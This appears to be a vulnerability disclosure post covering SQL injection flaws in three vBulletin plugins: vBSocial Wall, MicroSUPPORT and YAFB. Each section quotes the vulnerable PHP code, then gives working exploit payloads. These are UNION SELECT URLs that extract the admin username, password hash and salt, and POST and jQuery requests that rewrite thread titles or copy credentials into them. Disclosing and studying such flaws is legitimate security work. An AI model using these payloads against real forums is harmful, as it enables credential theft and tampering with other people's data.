vBulletin vBSocial.com Wall Plugin – SQL Injection

Plugin: http://www.vbulletin.org/forum/showthread.php?t=294260
Version: <= 2.5 (latest) The vulnerability resides in the misc_start hook and the /includes/class_statusbit.php file:

	public function process_fetch_status_item($status_id)
	{
		global $vbulletin;
		$status_item = $vbulletin->db->query_first(“SELECT * FROM “.TABLE_PREFIX.”status WHERE id=’$status_id'”);
		if ($status_item)
		{
			$status_item[‘message’] = htmlspecialchars_uni($status_item[‘message’]);
			$status_item[‘message’] = smartConvertPost($status_item[‘message’]); // parse image links
			$status_item[‘message’] = parse_youtubelinks($status_item[‘message’]);     // parse youtube video links
            $status_item[‘message’] = nl2br(trim(fetch_censored_text($status_item[‘message’])));

		     if ($status_item[‘type’] == ‘poll’){
		     	 $poll_get = $vbulletin->db->query_read(“SELECT * FROM “.TABLE_PREFIX.”status_poll WHERE statusid='”.$status_item[‘id’].”‘”);
		     	 if ($vbulletin->db->num_rows($poll_get) > 0){
		     	 	 $i = 0;
		     	 	while ($poll_item = $vbulletin->db->fetch_array($poll_get)){
		     	 		$i ++;
		     	 		$status_item[‘message’] .= ‘
‘; } } } return $status_item[‘message’]; } }

User input data is being passed to functions without being sanitized or checked.

Proof of concept:
http://example.com/misc.php?do=ln_fetch_status_item&status_id=11' UNION SELECT null, concat(username, 0x3a, password, 0x3a, salt), null, null, null, null, null, null, null, null, null, null, null FROM user WHERE userid = '1

This will display the username, password and salt of the user with id 1 in the database.

Images
vBSocial Wall SQL Injection

vBulletin MicroSUPPORT Plugin – SQL Injection

Plugin: http://www.vbulletin.org/forum/showthread.php?t=254336
Version: <= 4.6.4 (latest) The vulnerability resides in the microsupport.php file. Not a single variable is sanitized and directly used in the SQL queries, at all places. An easy way to extract information out of the database is by abusing the checkchatcall_request part in the php file, which looks like this:

if ($_REQUEST[‘requester’] == “checkchatcall_request”) {
	$adminsID = $vbulletin->input->clean_gpc(‘r’, ‘adminsID’, TYPE_STR);
	$chatcheck = $db->query_read(“SELECT * FROM “.TABLE_PREFIX.”microsupport_supportusers_online WHERE supportuserid=$adminsID”);
	
	while($row = $db->fetch_array($chatcheck)) {
		if($row[usersUID] > 0){
			$usersid = $row[usersUID];
    $output = ‘checkchatcall=1&supportuseridrequester=’.$usersid;
		}else{
    $output = ‘checkchatcall=0’;
		}
	}
	echo $output;
}

Proof of concept:
http://example.com/microsupport.php?requester=checkchatcall_request&adminsID=1 UNION SELECT null, concat(1, 0x3a, username, 0x3a, password, 0x3a, salt), null, null, null FROM user where userid = 1

Note that the first field in the concat function must be a number since the function checks if the usersUID is bigger than 0, which is the first column in the result.

Images
microSUPPORT SQL Injection

vBulletin YAFB – Yay! Another Facebook Bridge Plugin – SQL Injection

Plugin: http://www.vbulletin.org/forum/showthread.php?t=232457
Version: <= 3.3.2 (latest) The vulnerability resides in the /fbb/facebook.php file which is included in the /facebook.php file in the root of the forum. Line 211 to 245 in /fbb/facebook.php. First you see that they defined post_id as a TYPE_STR, which is a string, that makes it possible to send any string we want, as long as they don't sanitize it. Now take look at the first and second if statement. If the post_id variable contains an underscore, it will gladly accept the post_id variable in the UPDATE query in the next if statement without escaping/sanitizing it.

if ($_REQUEST[‘do’] == ‘update_log’) {
	$vbulletin->input->clean_array_gpc(‘p’, array(
		‘log_id’ => TYPE_UINT,
		‘post_id’ => TYPE_STR,
		‘exception’ => TYPE_STR,
		‘threadid’ => TYPE_UINT,
	));
	
	if ($vbulletin->GPC[‘log_id’] > 0) {
		if (strpos($vbulletin->GPC[‘post_id’],’_’) !== false) {
			$log_entry = array(
				‘result’ => $vbulletin->GPC[‘post_id’],
			);
		} else {
			$log_entry = array(
				‘result’ => $vbulletin->GPC[‘exception’],
				‘is_exception’ => 1,
			);
		}
		
		$vbulletin->db->query_write(fetch_query_sql($log_entry,’fbb_log’,”WHERE logid = {$vbulletin->GPC[‘log_id’]}”));
		
		if (empty($log_entry[‘is_exception’])) {
			if ($vbulletin->GPC[‘threadid’]) {
				//update Facebook PostID for the target thread (which has just been published to Facebook)
				$vbulletin->db->query(”
					UPDATE `” . TABLE_PREFIX . “thread`
					SET fbpid = ‘{$vbulletin->GPC[‘post_id’]}’
					WHERE threadid = ” . intval($vbulletin->GPC[‘threadid’]) . ”
				“);
			}
			
			($hook = vBulletinHook::fetch_hook(‘fbb_update_log’)) ? eval($hook) : false;
		}
	}
	
	exit;
}

The variable post_id is not properly sanitized, it’s also defined as a string while it should be an integer.

Since it’s in an UPDATE statement, you are limited to what you can do.
It’s very easy to update any column in the thread table of vBulletin this way, you can do this to any thread.

Example POST request:

POST to:	facebook.php
POST data:	do: update_log
		log_id: 1
		exception: somethingrandom
		post_id: 1', title='_SQL Injection
		securitytoken: SECURITYTOKEN

Proof of concept in jQuery:

$.post("facebook.php", {
	do: 'update_log', 
	log_id: 1, 
	threadid: 1, 
	exception: 'something', 
	post_id: "1', title='_SQL Injection", 
	securitytoken: SECURITYTOKEN
	},function(data){
		console.log(data);
});

This will update the title of thread with id 1 to _SQL Injection.
Note that the underscore is required since the script checks for an underscore in the variable.

However, we can also extract any data out of any table by doing something like the following:

$.post("facebook.php", {
	do: 'update_log', 
	log_id: 1, 
	threadid: 1, 
	exception: 'something', 
	post_id: "1', title = (SELECT concat(username, 0x3a, password, 0x3a, salt) FROM user WHERE userid = 1), keywords = '_hi", 
	securitytoken: SECURITYTOKEN
	},function(data){
		console.log(data);
});

This will change the title of the thread to the username, password and salt of userid 1.
Now of course you would want to change the title of the thread back to its original state.

YAFB SQL Injection